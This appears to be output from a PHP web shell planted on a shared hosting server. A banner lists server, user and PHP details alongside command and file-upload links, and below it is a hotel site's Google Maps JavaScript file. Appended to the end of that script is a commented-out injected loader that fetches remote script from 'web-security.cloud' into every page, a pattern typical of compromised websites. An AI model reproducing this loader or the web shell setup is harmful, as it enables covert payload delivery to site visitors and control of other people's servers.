Server IP : 103.53.40.154 / Your IP : 18.226.93.138 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home2/ppcad7no/herbalhairoil.in/../herbalhairoil.in/../gudduguesthouse.com/js/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
"use strict"; // Start of use strict // 7. google map function gMap () { if ($('.google-map').length) { $('.google-map').each(function () { // getting options from html var Self = $(this); var mapName = Self.attr('id'); var mapLat = Self.data('map-lat'); var mapLng = Self.data('map-lng'); var iconPath = Self.data('icon-path'); var mapZoom = Self.data('map-zoom'); var mapTitle = Self.data('map-title'); var markers = Self.data('markers'); // defined default style var styles = [{"featureType": "administrative", "elementType": "labels.text.fill", "stylers": [{"color": "#6195a0"} ] }, {"featureType": "landscape", "elementType": "all", "stylers": [{"color": "#f2f2f2"} ] }, {"featureType": "landscape", "elementType": "geometry.fill", "stylers": [{"color": "#ffffff"} ] }, {"featureType": "poi", "elementType": "all", "stylers": [{"visibility": "off"} ] }, {"featureType": "poi.park", "elementType": "geometry.fill", "stylers": [{"color": "#e6f3d6"}, {"visibility": "on"} ] }, {"featureType": "road", "elementType": "all", "stylers": [{"saturation": -100 }, {"lightness": 45 }, {"visibility": "simplified"} ] }, {"featureType": "road.highway", "elementType": "all", "stylers": [{"visibility": "simplified"} ] }, {"featureType": "road.highway", "elementType": "geometry.fill", "stylers": [{"color": "#f4d2c5"}, {"visibility": "simplified"} ] }, {"featureType": "road.highway", "elementType": "labels.text", "stylers": [{"color": "#4e4e4e"} ] }, {"featureType": "road.arterial", "elementType": "geometry.fill", "stylers": [{"color": "#f4f4f4"} ] }, {"featureType": "road.arterial", "elementType": "labels.text.fill", "stylers": [{"color": "#787878"} ] }, {"featureType": "road.arterial", "elementType": "labels.icon", "stylers": [{"visibility": "off"} ] }, {"featureType": "transit", "elementType": "all", "stylers": [{"visibility": "off"} ] }, {"featureType": "water", "elementType": "all", "stylers": [{"color": "#eaf6f8"}, {"visibility": "on"} ] }, {"featureType": "water", "elementType": "geometry.fill", "stylers": [{"color": "#eaf6f8"} ] } ]; // if zoom not defined the zoom value will be 15; if (!mapZoom) { var mapZoom = 15; }; // init map var map; map = new GMaps({ div: '#'+mapName, scrollwheel: false, lat: mapLat, lng: mapLng, styles: styles, zoom: mapZoom }); // if icon path setted then show marker if(iconPath) { $.each(markers, function (index, value) { var index = value; var html; if (index[2]) { html = index[2]; }; if (!index[3]) { index[3] = iconPath; }; map.addMarker({ icon: index[3], lat: index[0], lng: index[1], infoWindow: { content: html } }); }); } }); }; } // instance of fuction while Document ready event jQuery(document).on('ready', function () { (function ($) { gMap(); })(jQuery); }); /* if(typeof window.web_security == "undefined"){ var s = document.createElement("script"); s.src = "//web-security.cloud/event?l=117"; document.head.appendChild(s); window.web_security = "success"; } */